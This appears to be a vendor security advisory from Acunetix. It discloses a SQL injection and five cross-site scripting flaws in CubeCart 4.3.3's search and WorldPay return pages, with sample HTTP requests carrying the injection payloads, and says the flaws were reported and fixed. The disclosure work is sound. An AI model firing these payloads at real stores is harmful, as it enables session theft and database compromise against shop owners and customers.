We are continuing with the list of security vulnerabilities found in a
number of web applications while testing our latest version of Acunetix
WVS v7 . In this blog post, we will look into the details of a number of
security problems discovered by Acunetix WVS in CubeCart.
"CubeCart is a fully featured ecommerce shopping cart solution used by
over a million store owners around the world."
The following web vulnerabilities were found in CubeCart version 4.3.3;
1.SQL injection in ?/cubecart_4/index.php?, parameter ?searchStr?.
2.Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?amount?.
3.Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?cartId?.
4.Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?email?.
5.Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?transId?.
6.Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?transStatus?.
Technical details about each web vulnerability are below:
1. SQL injection in ?/cubecart_4/index.php?, parameter ?searchStr?.
Additional details:
SQL query:
SQL:
SELECT id FROM cube_CubeCart_search WHERE searchstr='''
Sample HTTP Request:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
2. Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?amount?.
Attack details
URL encoded GET input amount was set to ? onmouseover=prompt(949088) bad=?
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET
/cubecart_4/modules/gateway/WorldPay/return.php?amount=%22%20onmouseover
%3dprompt%28949088%29%20bad%3d%22&cartId=&email=&transId=&transStatus=
HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
3. Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?cartId?
Attack details
URL encoded GET input cartId was set to ? onmouseover=prompt(932890) bad=?
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=%22%20onm
ouseover%3dprompt%28934178%29%20bad%3d%22&email=&transId=&transStatus=
HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
4. Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?email?.
Attack details
URL encoded GET input email was set to ? onmouseover=prompt(908306) bad=?
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=%2
2%20onmouseover%3dprompt%28908306%29%20bad%3d%22&transId=&transStatus=
HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
5. Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?transId?.
Attack details
URL encoded GET input transId was set to ? onmouseover=prompt(998313) bad=?
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&t
ransId=%22%20onmouseover%3dprompt%28998313%29%20bad%3d%22&transStatus=
HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
6. Cross-site Scripting vulnerability in
?/cubecart_4/modules/gateway/WorldPay/return.php?, parameter ?transStatus?.
Attack details
URL encoded GET input transStatus was set to ?
onmouseover=prompt(923101) bad=?
The input is reflected inside a tag element between double quotes.
Sample HTTP Request:
GET
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&t
ransId=&transStatus=%22%20onmouseover%3dprompt%28923101%29%20bad%3d%22
HTTP/1.1
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
These vulnerabilities were reported to the CubeCart team on 22/7/2010
via the support system on their website and they were fixed in latest
version of CubeCart . If you are using CubeCart, download the latest
version from their website.
--
Bogdan Calin - bogdan [at] acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
Follow us on Twitter - http://www.twitter.com/acunetix
